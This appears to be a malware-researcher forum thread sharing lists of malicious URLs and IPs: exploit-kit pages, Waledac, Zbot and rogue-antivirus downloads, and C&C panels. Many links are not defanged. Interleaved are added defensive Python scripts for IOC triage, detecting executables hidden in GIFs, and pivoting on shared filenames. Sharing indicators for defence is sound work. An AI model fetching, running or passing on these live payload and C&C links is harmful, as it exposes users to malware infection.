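Added example (not from this thread, and not any poster's tooling): a small Python triage script for the kind of list posted above. It refangs hxxp:// entries, pulls the host out of each line, treats bare IPs as already resolved, and flags anything that lands inside a watched netblock such as 94.247.0.0/22. The host-to-IP table is a constructed stand-in for a passive DNS lookup so the script runs offline; 94.247.3.151 for the hostindianet.com names matches the robtex link above, while example-clean.test and its address are made up for the demo.

```python
"""Triage a thread-style IOC list against watched netblocks (added example)."""
import ipaddress
import re
from typing import Optional
from urllib.parse import urlsplit

# Netblocks worth watching, per the replies above.
WATCHED = [ipaddress.ip_network("94.247.0.0/22")]

# CONSTRUCTED host -> IP table standing in for a passive DNS lookup.
# The hostindianet.com entries follow the robtex pivot in the thread;
# example-clean.test is an invented, benign control entry.
PDNS = {
    "sadcwed.hostindianet.com": "94.247.3.151",
    "ghrgt.hostindianet.com": "94.247.3.151",
    "example-clean.test": "203.0.113.10",
}

_HXXP = re.compile(r"^hxxps?://", re.IGNORECASE)


def refang(line: str) -> str:
    """Turn a defanged hxxp:// or hXXp:// indicator back into a real scheme."""
    return _HXXP.sub(lambda m: m.group(0).lower().replace("hxxp", "http"), line.strip())


def extract_host(line: str) -> str:
    """Host part of a URL, a bare host, or a host/path line; port and path are dropped."""
    url = refang(line)
    if "://" not in url:
        url = "http://" + url  # bare "host/path" lines need a scheme for urlsplit
    return urlsplit(url).hostname or ""


def resolve(host: str) -> Optional[str]:
    """Literal IPs pass straight through; hostnames come from the constructed PDNS table."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        return PDNS.get(host)


def in_watched(ip: Optional[str]) -> bool:
    """True when the address sits inside one of the watched CIDRs."""
    return ip is not None and any(ipaddress.ip_address(ip) in net for net in WATCHED)


def triage(lines):
    """Return (original line, host, ip, hit) for every indicator line, skipping blanks and '-'."""
    rows = []
    for line in lines:
        text = line.strip()
        if not text or text == "-":
            continue
        host = extract_host(text)
        ip = resolve(host)
        rows.append((text, host, ip, in_watched(ip)))
    return rows


# Constructed input in the thread's own format (defanged URLs, bare IP paths, '-' separator).
SAMPLE = """hxxp://sadcwed.hostindianet.com/cache/readme.pdf
hxxp://ghrgt.hostindianet.com
94.247.2.173/.dif/go.php?sid=1
http://example-clean.test/in.cgi?income4
-
"""

if __name__ == "__main__":
    for text, host, ip, hit in triage(SAMPLE.splitlines()):
        print(f"{'HIT' if hit else '   '} {host:28} {ip or '-':16} {text}")
```

Swap PDNS for a real passive DNS or resolver call when running it against a live list; the CIDR check itself does not change.
-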
hxxp://porn-money.org/in.cgi?5
hxxp://dissolute-office.com/123.php
hxxp://gujjipuzzi.net/in.cgi?pipka
hxxp://benyodil.cn/pagess.html
hxxp://benyodil.cn/senks/al1/1/info.php
hxxp://gcounter.cn
hxxp://divinets.cn/z/5.htm
hxxp://divinets.cn/z/z.htm
hxxp://agkt.info/evo/count.php?o=4
hxxp://agkt.info/evo/exploits/x19.php?o=2&t=1237604581&i=1430963245
hxxp://tayforlive.ru/loader.exe
hxxp://20-ka.cn/bots/svchost.exe
hxxp://rampartech.com
hxxp://typyxiolix.com/stats-xp/
hxxp://84654321.cn/load.php
hxxp://pingpinghost.com/license.exe
-
some malware
http://www.milehighhomefinder.com/include/class/tinymce1/a.exe
http://c-0p.cn:6135/qwer/lzz.css
-
Ambler trojan C&C panel login:
http://www.mybussines.biz/best/admin.php
http://fixet.ru/admin.php
-
rogue:
win-pc-defender.com
http://www.threatnuker.com/bin/ThreatNukerSetup.exe
-
http://judns.net/jud/pdf.php?id=124
http://judns.net/jud/pdf.php?id=111
http://judns.net/jud/load.php?id=9747&spl=2
-
The exe is pasted into a gif:
ppkok.cn/file/mm.gif
http://28.16868.org/long/logo.gif
http://28.16868.org/long/logo18.gif
-
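Added example, not part of the post above: a check for the "exe pasted into a gif" trick. Rather than grepping for "MZ" (which fires on random bytes), it only accepts a DOS header whose e_lfanew field points at a valid "PE\0\0" signature, which is what a real embedded executable must have. The sample blob is constructed here (a GIF header followed by a stub DOS/PE header, not real malware); the 0x1000 ceiling on e_lfanew is a sanity bound chosen for the demo.

```python
"""Detect a Windows PE image hidden inside a GIF (added example)."""
import struct

GIF_MAGICS = (b"GIF87a", b"GIF89a")


def find_embedded_pe(data: bytes):
    """Offset of the first plausible PE image in data, or None.

    A hit requires an MZ header whose e_lfanew (DWORD at DOS offset 0x3C)
    lands on a "PE\\0\\0" signature; a bare "MZ" byte pair is not enough.
    """
    pos = data.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(data):  # need the full 64-byte DOS header
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            pe_off = pos + e_lfanew
            # 0x40 <= e_lfanew: the NT headers cannot overlap the DOS header;
            # < 0x1000 is an assumed sanity bound for this demo, not a PE rule.
            if 0x40 <= e_lfanew < 0x1000 and data[pe_off:pe_off + 4] == b"PE\0\0":
                return pos
        pos = data.find(b"MZ", pos + 1)
    return None


def classify(data: bytes) -> dict:
    """Report whether the blob claims to be a GIF, whether it carries a PE, and where."""
    is_gif = data[:6] in GIF_MAGICS
    pe_off = find_embedded_pe(data)
    return {
        "gif_header": is_gif,
        "pe_offset": pe_off,
        "suspicious": is_gif and pe_off is not None,  # image container + executable inside
    }


def build_sample() -> bytes:
    """CONSTRUCTED test blob: minimal GIF89a header, then a stub DOS + PE header (no code)."""
    gif = b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 20   # 33 bytes
    dos = bytearray(b"MZ" + b"\x00" * 0x3E)                              # 64-byte DOS header
    struct.pack_into("<I", dos, 0x3C, 0x40)                              # e_lfanew -> right after it
    pe = b"PE\0\0" + b"\x4c\x01"                                        # signature + IMAGE_FILE_MACHINE_I386
    return gif + bytes(dos) + pe


if __name__ == "__main__":
    print(classify(build_sample()))
```

On a real file the offset returned is where to carve from; the same check works for "logo.gif"-style payloads in any container, since only the MZ/PE consistency is tested.
-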
Waledac
http://duklin.againstfear.com/news.exe
-
205.209.143.94/1122.htm
205.209.143.94/000f1.htm
205.209.143.94/000f2.htm
haola123123.com/7700.htm
haola123123.com/0081.htm
It seems that more domains are sharing the same files, as I got 1122.htm as a string in more than one executable, and all are requesting this file from another domain.
-
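Added example, not the poster's own method: a way to do the pivot described above on purpose. It pulls URL-shaped strings out of a set of binaries (plain ASCII and UTF-16LE, the two encodings Windows droppers commonly store them in) and groups them by path, so a filename like 1122.htm that several samples fetch from different hosts stands out. The three "executables" are constructed byte blobs with hosts under the reserved .example TLD; only the filename comes from the post.

```python
"""Pivot on a download filename shared across several executables (added example)."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# URL-shaped runs of printable ASCII: bytes form for raw scanning, str form for decoded text.
_ASCII_URL = re.compile(rb"https?://[\x21-\x7e]{4,200}")
_TEXT_URL = re.compile(r"https?://[\x21-\x7e]{4,200}")
# A UTF-16LE run of printable characters: each ASCII byte followed by a NUL, six or more in a row.
_WIDE_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")


def extract_urls(blob: bytes) -> set:
    """URLs present in blob either as plain ASCII or as UTF-16LE wide strings."""
    found = {m.group(0).decode("ascii") for m in _ASCII_URL.finditer(blob)}
    for run in _WIDE_RUN.finditer(blob):
        found.update(_TEXT_URL.findall(run.group(0).decode("utf-16-le")))
    return found


def pivot_by_path(samples: dict) -> dict:
    """samples maps sample name -> bytes.

    Returns {path: {host: [sample names]}} restricted to URL paths that are
    requested from more than one host across the set, which is the signal
    the post above noticed by hand.
    """
    by_path = defaultdict(lambda: defaultdict(list))
    for name, blob in samples.items():
        for url in extract_urls(blob):
            parts = urlsplit(url)
            by_path[parts.path][parts.hostname].append(name)
    return {path: {host: sorted(names) for host, names in hosts.items()}
            for path, hosts in by_path.items() if len(hosts) > 1}


def build_samples() -> dict:
    """CONSTRUCTED stand-ins for three droppers: MZ magic, NUL padding, embedded URLs.
    Hosts are invented (.example); 1122.htm is the filename from the thread."""
    pad = b"\x00" * 16
    return {
        "a.exe": b"MZ" + pad + b"http://a.example/1122.htm" + pad + b"http://a.example/000f1.htm" + pad,
        "b.exe": b"MZ" + pad + "http://b.example/1122.htm".encode("utf-16-le") + pad,  # wide string
        "c.exe": b"MZ" + pad + b"http://b.example/7700.htm" + pad,
    }


if __name__ == "__main__":
    for path, hosts in pivot_by_path(build_samples()).items():
        print(path)
        for host, names in hosts.items():
            print(f"  {host:20} {', '.join(names)}")
```

Packed samples will hide their strings until unpacked or dumped from memory; run the pivot on the unpacked image when the raw file yields nothing.
-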
This one is quite hilarious...
hxxp://ygy.ru/index.php
DL lists...
hxxp://b.wuc7.com/tt.txt
hxxp://l.sog369.com/list.txt
hxxp://www.iukjthgvg.cn/kankan.txt
hxxp://70.38.11.165/admin/cgi-bin/get_domain.php?type=download
hxxp://best-click-download.info/install.php ---> Spawns fake av executable...
hxxp://69.249.79.161/print.exe
-> Waledac variant:
http://www.virustotal.com/analisis/892cc1f2514f891fc20c81baa4ec1a2f
http://www.bfk.de/bfk_dnslogger_en.html?query=78.129.166.5#result
I especially enjoyed this one...
hxxp://rbckc.com/redir=1566237.php
-
http://dlmaldef09.com/maldef09/install.php?track_id=10284
http://getmaldef09.com/maldef09/setup.php?track_id=10284
http://84.16.247.29/maldef09/setup.php?track_id=10284
Now time to track the "Total Security Protection" rogue throwaway sites
http://transformercity.cn/soft.php?aid=0479&d=1&refer=9d9cbe78e
http://antivirusonlineproscanner.com/promo/1/freescan.php?nu=880479&back==jQx3Tz2NkMOMI=N
-
hxxp://xprotect.us/index.php?affid=02935
hxxp://personal-antivirus.com//download/PersonalAntivirus.exe
hxxp://protectprivacy18.com/maldef09_2/4/10250
hxxp://www.secure-data-group.com/
Various crap hosted on the following IPs; I've only had a really quick look at them:
some domains out of them were already spotted in the past, others seem to be temporarily "inactive" or so (yeah, sure...)
http://www.bfk.de/bfk_dnslogger_en.html?query=78.26.179.189#result
http://www.bfk.de/bfk_dnslogger_en.html?query=94.247.3.40#result
http://www.bfk.de/bfk_dnslogger_en.html?query=94.247.3.41#result
http://www.bfk.de/bfk_dnslogger_en.html?query=94.247.3.42#result
http://www.bfk.de/bfk_dnslogger_en.html?query=212.117.165.126#result
http://www.bfk.de/bfk_dnslogger_en.html?query=212.117.165.127#result
http://www.bfk.de/bfk_dnslogger_en.html?query=212.117.165.128#result
-
http://www.photogalleryy.com/image.php
Redirects to:
http://66.29.31.3/~rivux/PIC2009-02-15-JPG.exe
http://89.149.254.237/redirect.php?type=0
redirect to:
http://cancelyourdreams.cn/Installer2.exe
There is malware there numbered 1-6:
http://hackdownload.cn/install/1.exe
-
hxxp://anti-virus-2010-pro.info/install.php
hxxp://anti-virus-2010-pro-downloads.info/en/exe/install.exe
http://www.bfk.de/bfk_dnslogger_en.html?query=70.38.19.201#result
================================================
Now, if someone can explain to me what in the world the purpose of this one is... ???
hxxp://www.anti-virus-1.net/
It loads a Kaspersky .jpg advertisement from here...
hxxp://www.vaginoplasty-1.net/AV.jpg
Which is an open dir as well...
hxxp://www.vaginoplasty-1.net/
-
Waledac:
http://antiterrornetwork.com/run.exe
http://fearalert.com/run.exe
http://terrorfear.com/run.exe
http://antiterroris.com/run.exe
http://terroralertstatus.com/run.exe
http://chatloveonline.com/run.exe
http://lovecentralonline.com/run.exe
http://supersalesonline.com/run.exe
http://bestlifeblog.com/run.exe
http://mobilephotoblog.com/run.exe
I could sit for hours and get like 100 domains which host it ;D
-
I could sit for hours and get like 100 domains which host it ;D
Lol ;-)
As a side note, the ShadowServer people are maintaining a regularly updated list of Waledac domains...
http://www.shadowserver.org/wiki/uploads/Calendar/waledac_domains.txt
-
good to know :o
I was checking domains registered on the same IP with http://www.bfk.de/bfk_dnslogger_en.html
-
Rootkit TDss
http://plumpals.com/download/666c507271673d3d83b13d19/License.v.3.413.exe
OSX/RSPlug-F (user agent=Mac OS X)
http://plumpals.com/download/666c507271673d3d83b13d19/License.v.3.413.dmg
http://www.virustotal.com/it/analisis/438939832ba104f34907e919bc2ddac1
-
Waledac crap... current detection rates in VirusTotal at 6/39 (15.39%), here's a sample report:
http://www.virustotal.com/analisis/fb778f91c5a76e68eddbec3955c7dd44
hxxp://24.9.38.40/save.exe
hxxp://64.95.58.150/contact.exe
hxxp://64.95.58.153/news.exe
hxxp://67.223.10.108/save.exe
hxxp://69.242.22.235/main.exe
hxxp://69.14.54.169/save.exe
hxxp://69.14.99.11/contact.exe
hxxp://98.127.138.99/print.exe
hxxp://98.127.144.188/contact.exe
hxxp://99.190.177.125/run.exe
C&C servers...
hxxp://213.155.4.80/bm/controller.php?action=bot&entity_list=
hxxp://213.155.6.32/fine/controller.php?action=bot&entity_list=
hxxp://medievalmusic.by.ru/ -> Open dir...
More crap on the same IP, spamming/phishing etc...
http://www.bfk.de/bfk_dnslogger_en.html?query=87.242.78.57#result
http://www.robtex.com/ip/87.242.78.57.html
It also redirects to strhq.cn, which was spotted previously...
hxxp://medievalmusic.by.ru/mhstchk.php
-
It also redirects to strhq.cn, which was spotted previously...
hxxp://medievalmusic.by.ru/mhstchk.php
Have you seen this ?
<?php echo "<!--"."hello_my_little_friend._You_have_download_this_page_and_see_th" . "is_source._We_do_not_delete_anything_only_upload_change_your_passwords_and_do_not_say_it_to_anybody"."-->"; ?>
-
He-he, yeah, quite ridiculous, isn't it? And it's the "haitou.php" scumbags again...
-
))
-
In:
http://interhack777.by.ru
http://wepawet.iseclab.org/view.php?hash=083efd85e283aff8a4fd9c18839aa1cf&t=1237898209&type=js
iframe of:
http://interhack777.by.ru.33406df8d1f8b3f1.beencn.cn/china.cn/
http://wepawet.iseclab.org/view.php?hash=45dc5f553ec84eb856a67f69c4f330a0&t=1237898552&type=js
which redirects to luckysploit at:
http://193.138.172.15/salo/?t=6
http://wepawet.iseclab.org/view.php?hash=04288c0e3940bbf4229e4d19f439e43a&t=1237478938&type=js
that downloads a trojan at:
http://193.138.172.15/salo/?h=17
http://www.virustotal.com/analisis/bf83ca150e492a461d5ee61efbdb3987
another trojan that is downloaded is:
http://lousecn.cn/load/6FCF55/ie709001
http://www.virustotal.com/analisis/e437f79fac10473bf74647dcd7326662
-
variant of Win32/Adware.Agent.NLE
hxxp://av1-click-download.info/en/PE/QWProtect.dll
http://www.virustotal.com/analisis/6374e6460d03174dc78c5a2081eeb6ce
-
and on the same IP:
http://av1-click-site.info/
-
http://best-tube-home.com/
http://check-ms-antivirus.com/
Both use social engineering (a fake media player codec) to download from:
http://files.ms-loads-av.com/exe/setup_1_2_1.exe
only one antivirus hit:
http://www.virustotal.com/analisis/126210179d475c81a40b6a371cef7c6d
-
Redirects to/contains exploits (the PDF exploit domain is on MDL):
http://bc69.by.ru
PDF exploit which it redirects to:
http://vpsspeedin.ru/1/pdf.php
http://wepawet.iseclab.org/view.php?hash=6f162c5dc313445ba755f9a799be7725&t=1237919023&type=js
downloads zbot at:
http://virtyoz.info/image/fi/load.php?id=35&spl=4
http://www.virustotal.com/analisis/ce5fe16d39d64107ad2cd6884973a4c7
-
Some of my dingleberries from last few weeks :P
193.138.172.15/salo/?147b3cce4c7a455a85f424e630027351bf0decf9f5c2b6d461921318e73373ab5e0130cfa1d11ea6c772b232b5d24e7ad2226b2dc8abc83c2ad9492b6db74993
193.138.172.15/salo/?20630100614f1cb3b7617371a94dbb01aa6d6dea5501ab9b7bf031b622f263e38c36d0fbabdd4cc02766c70ef43594ab87f95e5a6dedbb95c1c2002dc05b14ef
193.138.172.15/salo/?5d9a3d064381864ad8ed6762adf8565929609ff4ff7598a008a3221cd4f456817bb3295a4c3a96ee7340286017c5b6b22632f52f4e3129e820b07e0528d987e0
193.138.172.15/salo/?6b76746d927a2b6a6ad63796b25d9a570c150a54f2639109ac0d45a04f4a964d11024c9721a1528be007f8ad424a5c495523b1c915d1b3d370c65a64291f9df2
193.138.172.15/salo/?t=6
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB00053000060B10
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530060C1117
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530090F1419
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530292F3439
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530787E8389
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB00053083898E93
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530A3A9AEB3
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530A9AEB3B8
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530B2B8BDC2
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530F1F7FC01
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C000000376600000001760000005DEB000530F9FF0409
209.34.91.23/imp2/12400.php
64.225.158.70/aNI022328/?code=BundleBase1.2328
64.225.158.70/bpx/xS5PN9.exe
69.147.239.106/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530191F2429
69.147.239.106/40E8000E4457572D414D31443831323036376C0000003766000000007600000642EB000530F1F7FC01
84.244.138.55/ase/?17d5d5f9dd0c1644f0f6b20b74ec080c4851ccd7da471b3ffe20293cba2e2f8981cacb18bd70dcae3597fc9eeb532e5ba20ea2283c25034d7c7a97df26c2ecac
84.244.138.55/ase/?712243de3e49129542d7beaf3af5e88f733447a27f28b850760e21c47fa99c7f3b589f8d92c08a3172ca3256cdb9c70c44c67b0a8990710d9ba987d4e3acda69
84.244.138.55/ase/?8a14b1d4f1a9842e935b9c14a07a5979f6e7639d50aff7bd0ec99dbbc3c36624d75277965f27068231bc845ab36d730920afc0341b1e0912c4a41c243676b411
84.244.138.55/ase/?8ca27317863d8812f429a9eae57ac422292fe38932698e9fde1f2dd3c4bbf4a58a12642e80fa68ce4d916e93e17562fe95930129e9fd1f8ab98f7b02d272b439
84.244.138.55/ase/?h=5ac0i?892bd46e0100f07002da639a9a060000000002c15031930001040900000000170
84.244.138.55/ase/?t=3
84.244.138.55/ts/in.cgi?lapp
94.75.234.35/data/u560x417145113
94.75.234.35/html/b874550815x19
94.75.234.35/data/ffc306323898
94.75.234.35/data/u560s1x25980757
94.75.234.35/html/kpnm1225628204
athlon.sibers.com/111.exe
benyodil.cn/pages2.html
benyodil.cn/pagess.html
benyodil.cn/senks/al1/1/404.php
benyodil.cn/senks/al1/1/flash.php
benyodil.cn/senks/al1/1/getexe.php?h=11
benyodil.cn/senks/al1/1/info.php
benyodil.cn/senks/al1/2/index.php
benyodil.cn/senks/al1/2/pdf.php
cfsiqejclo.com/progs/jokkl/aqmznana.php
cfsiqejclo.com/progs/jokkl/bxyyyyl.php
cfsiqejclo.com/progs/jokkl/cclmmmzmna
cfsiqejclo.com/progs/jokkl/dzzaaanxkx.php
cfsiqejclo.com/progs/jokkl/eoooocccpd.php?adv=adv656
cfsiqejclo.com/progs/jokkl/hhrrre.php?adv=adv656&code1=KNIH&code2=0154&id=-1331090992&p=0
cfsiqejclo.com/progs/jokkl/liivvwf.php
cfsiqejclo.com/progs/jokkl/qmzhr.php
cfsiqejclo.com/progs/jokkl/vrrsfssgt.php
cfsiqejclo.com/uniq.php?id=-1331090992&p=0
ctfmon.info/cd/cd.php?id=&ver=nz0
ctfmon.info/cd/cd.php?id=1C9A716AFEE7CF2&ver=nz6
ctfmon.info/cd/uns.php?id=&ver=nz0
dfhatnjfjw.net/ccsuper0.php
dfhatnjfjw.net/ccsuper1.php
dfhatnjfjw.net/ccsuper2.php
divinets.cn/xts/in.cgi?7
divinets.cn/z/1.htm
excelsystems.cn/soft.php?aid=0860&d=1&refer=be4f5fba9
firstgate.ru/33/cache/flash.swf
firstgate.ru/33/cache/readme.pdf
firstgate.ru/33/load.php?id=0
firstgate.ru/33/load.php?id=4
firstgate.ru/33/t.php
gbvql.wwlax.com/get_frst.php?uid=3423165F-07C8-1033-0623-990000000001
gbvql.wwlax.com/gt_bd_93.php
gbvql.wwlax.com/gt_ky.php
globalstats.net/loads/goo.exe
globalstats.net/loads/instcash.exe
globalstats.net/yes/index.php
globalstats.net/yes/load.php
gogo2me.net/.dif/go.php?sid=1
gogo2me.net/.go/check.html
gogo2me.net/.lck/?1e0f7f566750932cf9b96399a3a313ab712552ca04c019d33f696298486535fb54f7049de7dc2d36eb11acb071200d262a7deba7573384091c4d7c8de7b5302c
gogo2me.net/.lck/?t=3
google-analistyc.net/in.cgi?5
gujjipuzzi.net/in.cgi?pipka2
gujjipuzzi.net/su/in.cgi?19
hansali4.com/731l2.exe
members.upc.pl/i.lemecha/index.gif
mystats.cn/?cid=streamb&code=strim
mystats.cn/000/cscpu2.php?t=img&cid=amazonka&n=1&mode=html
mystats.cn/000/cscpu2.php?t=img&cid=skype&n=1&mode=html
mystats.cn/000/cscpu2.php?t=img&cid=streamb&n=1&mode=html
mystats.cn/general/mzn/promo.jpg
mystats.cn/general/mzn/promobanner.php
mystats.cn/general/skype/promo.jpg
mystats.cn/general/skype/promobanner.php
mystats.cn/general/skype/skype.gif
mystats.cn/general/skype/stats.php
mystats.cn/streamb/hdtvauction/hdtv-banner.jpg
mystats.cn/streamb/hdtvauction/popup.php
mystats.cn/streamb/hdtvauction/ppc.php
nolagtime.com/gwc.txt
nolagtime.com/p33r/?v=19&aic=0&p=6150&su=0&fu=0
pakras.com/fky/3rkour.dat
pakras.com/fky/mp.dat
pakras.com/fky/zro.dat
pakras.com/iz98kbhg/404.php
pakras.com/iz98kbhg/flash.php
pakras.com/iz98kbhg/getexe.php?h=11
pakras.com/iz98kbhg/getexe.php?h=31
pakras.com/iz98kbhg/info.php
pakras.com/iz98kbhg/pdf.exp.php
pakras.com/oy5x552m/info.php
pakras.com/tn99y3w3/info.php
pakras.com/u57cwchq/info.php
porn-money.org/default.cgi
porn-money.org/in.cgi?2
reddii.ru/traffic/sploit1/?1850ytdbVddYad
reddii.ru/traffic/sploit1/?470ybVYadbtbt
reddii.ru/traffic/sploit1/getexe.php?h=11
reddii.ru/traffic/sploit1/getfile.php?f=swf
rifnasax.cn/in.cgi?2
rifnasax.cn/nuc/exe.php
rifnasax.cn/nuc/index.php
sexbases.cn/gr.php
sexbases.cn/in.cgi?15
sexbases.cn/in.cgi?20
sexbases.cn/vas.php
sexbases.cn/wed.html
teleporn.net/in/init.php
teleporn.net/stat/cache/flash.swf
teleporn.net/stat/cache/readme.pdf
teleporn.net/stat/index.php
teleporn.net/stat/load.php?id=0
teleporn.net/stat/load.php?id=4
thehugetitstop.cn/1/in.php
thehugetitstop.cn/1/load.php?id=1
thehugetitstop.cn/1/load.php?id=6
thehugetitstop.cn/1/pdf.php
thehugetitstop.cn/dontstop.html
thehugetitstop.cn/kadastr.html
thehugetitstop.cn/moon.html
topdaynews.eu/norad/robo.php?r=1
topdaynews.eu/norad/robo.php?r=4
topdaynews.eu/norad/robo.php?r=5
topdaynews.eu/norad/robo.php?r=6
topdaynews.eu/norad/tasks/US
tozxiqud.cn/in.cgi?2
tozxiqud.cn/nuc/exe.php
tozxiqud.cn/nuc/index.php
vpsspeedin.ru/1/in.php
vpsspeedin.ru/1/load.php?id=1
vpsspeedin.ru/1/load.php?id=6
vpsspeedin.ru/1/pdf.php
www.dearbornbarry.com/images/1/bin/default.exe
www.dearbornbarry.com/images/1/bin/hxS.exe
www.dearbornbarry.com/images/1/bin/load.exe
www.dearbornbarry.com/images/1/bin/test.exe
www.dearbornbarry.com/images/1/index.php
www.dearbornbarry.com/images/1/load.php?com=cfecdb276f634854f3ef915e2e980c31
www.dearbornbarry.com/images/1/load.php?mdc=0.46815614385941473
www.dearbornbarry.com/images/1/load.php?mdc=0.6208075561393851
www.dearbornbarry.com/images/1/load.php?mdc=0.7461394047952373
www.dearbornbarry.com/images/1/load.php?mdc=0.9528790372625641
www.messangerupdate.com/conf/BHOversion.asp
www.messangerupdate.com/conf/conf/conf-new.aspx
www.messangerupdate.com/conf/msgasst.dll
www.messangerupdate.com/conf/msgutil.dll
www.onlineanalytics.cn/files/20026.exe
yourwindowsvista.com/cd/cd.php?id=1C9A716AFEE7CF2&ver=nz6
0u0u.ru/nagios/cd.php?userid=--
0u0u.ru/nagios/cd.php?userid=14032009_065836_4950250
0u0u.ru/nagios/dan.php
0u0u.ru/nagios/datu.php
0u0u.ru/nagios/sdt.php
193.138.172.14/install3/security-update-KB944085.exe
193.138.172.14/install4/security-update-G5664085.exe
193.138.172.14/install4/security-update-KB964085.exe
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000018766000000007600000642EB000530B8BEC3C8
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C000001876600000001760000005DEB000530C7CDD2D7
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000018A66000000007600000642EB000530FE040A0F
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000018A6600000001760000005DEB000530FC02070D
64.151.72.252/aaqqe?sid=648&d=15_22_40&v=945
64.151.72.252/aaqqe?sid=672&d=15_22_58&v=898
64.151.72.252/aaqqe?sid=703&d=15_22_43&v=977
64.151.72.252/aaqqe?sid=713&d=15_22_49&v=943
64.191.15.133/rio?d=kjdd&j=jjjjjs&t=zbxbhcuzafzz&k=kkkkkkklpqkkkkkk&y=yfejdjeh&x=ydci
64.191.15.133/rio?s=zyss&f=fffffo&o=uwswcxpuva&g=mmggggggghlm&w=wwww&l=lllsrw&h=mqmhukus
64.191.15.133/rio?u=bauuuuuuudacyc&r=fasx&e=lqkkeeee&x=xxxycdxx&p=pppppwva&s=yhbcccxb
66.45.246.146/40E8000879B9FABC48B65F576C0000014166000000007600000177EB000530F2F19529
66.90.101.177/chimera/ldr.exe
66.90.101.177/chimera/nDler.exe
66.90.101.177/ldr/dl/chMiB.exe
66.90.101.177/ldr/dl/minisvr4.exe
66.90.101.177/ldr/dl/mSrv.exe
66.90.101.177/ldr/dl/zchMiB.exe
66.90.101.177/ldr/files/mSrv.exe
66.90.101.177/ldr/files/zchMiB.exe
66.96.229.213/rio?d=kjdd&e=eeeeenkmimsnfk&a=hmggaaaaaa&x=xxcdxxxxxx&j=jqpupvyvmomp
66.96.229.213/rio?m=tsmmmmmmmvsu&e=imsnfklqkk&f=fffffffg&f=klfffffffm&u=afvz&w=aiyddl
66.96.229.213/rio?w=dcwwwwwwwfceaekf&i=jopuooiiiiiiii&v=abvvvvvvvcbgyvei&z=mzfz
76.191.98.246/nyfa32.exe
84.16.247.29/maldef09/install.php?track_id=10232
85.17.166.175/aaqqe?sid=684&d=15_22_55&v=911
85.17.166.175/aaqqe?sid=702&d=15_22_52&v=904
85.17.166.218/dwn/kb802348.dll
96.9.142.101/nyfa32.exe
amerika.by/libraries/tcpdf/images/spl/cfg/fies/load.php?id=31
amerika.by/libraries/tcpdf/images/spl/cfg/fies/pdf.php?id=31
benyodil.cn/pagess.html
benyodil.cn/senks/al1/1/404.php
benyodil.cn/senks/al1/1/flash.php
benyodil.cn/senks/al1/1/getexe.php?h=11
benyodil.cn/senks/al1/1/info.php
benyodil.cn/senks/al1/2/index.php
benyodil.cn/senks/al1/2/load.php
benyodil.cn/senks/al1/2/pdf.php
bestlotron.cn/in.cgi?cocacola51
betstarwager.cn/in.cgi?cocacola25
betstarwager.cn/in.cgi?cocacola26
betstarwager.cn/in.cgi?cocacola51
betstarwager.cn/in.cgi?cocacola73
betstarwager.cn/in.cgi?cocacola74
bizoplata.ru/1/in.php
bizoplata.ru/1/load.php?id=1
bizoplata.ru/1/load.php?id=6
bizoplata.ru/1/pdf.php
bizoplata.ru/exchange.html
bizoplata.ru/funt.html
bizoplata.ru/pay.html
bizoplata.ru/s/in.cgi?5
bizoplata.ru/topcurs.html
botconnet.cn/nuc/index.php
bulkbin.cn/in.cgi?2&group=dns01&seoref=&parameter=$keyword&keyword=$keyword&se=$se&ur=1
clearadvare2008.cn/in.cgi?8
clickcouner.cn/?117f66bf567c1382b6d7ba2ad370c82ce78ed4c3c24b143599e9a15b876c0f9b20470530a0e11f40f1a5d5da8ed912c4d5236110653fafd952640bf635e837e2
clickcouner.cn/?3a8f76910fa0181ba6b5479a46825e4cafb742be29b6894b397da137363bed3cc794a770116e95afe10b7c4c5c4bb4ebcd2454a0636855f26e77bf36f0b47146
clickcouner.cn/?54cea7d7c7682f27df5070357c7a60e747f1b261e4d5d55b9fd8f8880e4a525ee4fc4b965e78fbbe4587ec538b22c2a078d2218a087d7a1b2fda9cff3739a4c2
clickcouner.cn/?8cc76fb22005a8b936b886a6800f481da000c0c523a044a870836623e8daea4f679f86f35ca39c72a0482f6675a1a126d9c13b9073fb6c36b82873e1c9394baf
clickcouner.cn/?t=5
d1gix.net/forum/index.php
d1gix.net/forum/load.php?id=1301
d1gix.net/forum/load.php?id=1301&spl=4
d1gix.net/forum/pdf.php?id=1301
desktoprepairpackage.com/secure/3e448f5c3098045f42569da80c168ea7/49b6f34a/bestvirusremover2009.com/virusremover2009_setup_free_rezer_en.exe
desktoprepairpackage.com/secure/9417212421c1fb9821e530ddbd2b7c34/49b6f21e/bestvirusremover2009.com/virusremover2009_setup_free_rezer_en.exe
download.advancesoftwaretool.com/secure/4308c3fd58e7dabcf7f5ffd3b21eca90/49ba4ac1/bestvirusremover2009.com/virusremover2009_setup_free_rezer_en.exe
